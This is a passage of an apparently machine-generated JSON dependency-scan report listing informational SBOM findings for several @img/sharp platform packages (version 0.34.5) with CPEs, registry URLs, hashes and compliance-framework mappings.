0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fd64c295f8bc0b6a", "name": "@img/sharp-linux-arm64", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-arm64:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-arm64:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_arm64:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_arm64:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-linux-arm64@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-linux-arm64/-/sharp-linux-arm64-0.34.5.tgz", "integrity": "sha512-bKQzaJRY/bkPOXyKx5EVup7qkaojECG6NLYswgktOZjaXecSAeCWiZwwiFf3/Y+O1HrauiE3FVsGxFg8c24rZg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7108a685f3138a28", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-linux-ppc64 0.34.5", "title": "@img/sharp-linux-ppc64 0.34.5", "description": "Package discovered: @img/sharp-linux-ppc64 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3b1510e0e0b839b3", "name": "@img/sharp-linux-ppc64", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-ppc64:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-ppc64:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_ppc64:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_ppc64:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-linux-ppc64@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-linux-ppc64/-/sharp-linux-ppc64-0.34.5.tgz", "integrity": "sha512-7zznwNaqW6YtsfrGGDA6BRkISKAAE1Jo0QdpNYXNMHu2+0dTrPflTLNkpc8l7MUP5M16ZJcUvysVWWrMefZquA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7bce516733b8ed22", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-linux-riscv64 0.34.5", "title": "@img/sharp-linux-riscv64 0.34.5", "description": "Package discovered: @img/sharp-linux-riscv64 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "523b83e120964834", "name": "@img/sharp-linux-riscv64", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-riscv64:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-riscv64:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_riscv64:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_riscv64:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-linux-riscv64@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-linux-riscv64/-/sharp-linux-riscv64-0.34.5.tgz", "integrity": "sha512-51gJuLPTKa7piYPaVs8GmByo7/U7/7TZOq+cnXJIHZKavIRHAP77e3N2HEl3dgiqdD/w0yUfiJnII77PuDDFdw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "95b5e1930a0a90db", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-linux-s390x 0.34.5", "title": "@img/sharp-linux-s390x 0.34.5", "description": "Package discovered: @img/sharp-linux-s390x 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "cdcec5be4d61926b", "name": "@img/sharp-linux-s390x", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-s390x:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-s390x:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_s390x:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_s390x:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-linux-s390x@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-linux-s390x/-/sharp-linux-s390x-0.34.5.tgz", "integrity": "sha512-nQtCk0PdKfho3eC5MrbQoigJ2gd1CgddUMkabUj+rBevs8tZ2cULOx46E7oyX+04WGfABgIwmMC0VqieTiR4jg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ba4a76a3169a3261", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-linux-x64 0.34.5", "title": "@img/sharp-linux-x64 0.34.5", "description": "Package discovered: @img/sharp-linux-x64 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8ea3a106d5c8d10b", "name": "@img/sharp-linux-x64", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-x64:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux-x64:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_x64:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux_x64:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linux:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linux:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-linux-x64@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-linux-x64/-/sharp-linux-x64-0.34.5.tgz", "integrity": "sha512-MEzd8HPKxVxVenwAa+JRPwEC7QFjoPWuS5NZnBt6B3pu7EG2Ge0id1oLHZpPJdn3OQK+BQDiw9zStiHBTJQQQQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "357195decb462ec7", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-linuxmusl-arm64 0.34.5", "title": "@img/sharp-linuxmusl-arm64 0.34.5", "description": "Package discovered: @img/sharp-linuxmusl-arm64 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c5d74af075cbec8c", "name": "@img/sharp-linuxmusl-arm64", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl-arm64:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl-arm64:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl_arm64:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl_arm64:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-linuxmusl-arm64@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-linuxmusl-arm64/-/sharp-linuxmusl-arm64-0.34.5.tgz", "integrity": "sha512-fprJR6GtRsMt6Kyfq44IsChVZeGN97gTD331weR1ex1c1rypDEABN6Tm2xa1wE6lYb5DdEnk03NZPqA7Id21yg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5332b892777fe61c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @img/sharp-linuxmusl-x64 0.34.5", "title": "@img/sharp-linuxmusl-x64 0.34.5", "description": "Package discovered: @img/sharp-linuxmusl-x64 0.34.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "26c07c454ffe91ee", "name": "@img/sharp-linuxmusl-x64", "version": "0.34.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl-x64:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl-x64:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl_x64:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl_x64:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp-linuxmusl:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp_linuxmusl:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@img\\/sharp:\\@img\\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40img/sharp-linuxmusl-x64@0.34.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@img/sharp-linuxmusl-x64/-/sharp-linuxmusl-x64-0.34.5.tgz", "integrity": "sha512-Jg8wNT1MUzIvhBFxViqrEhWDGzqymo3sV7z7ZsaWbZNDLXRJZoRGrjulp60YYtV4wfY8VIKcWidjojlLcWrd8Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and 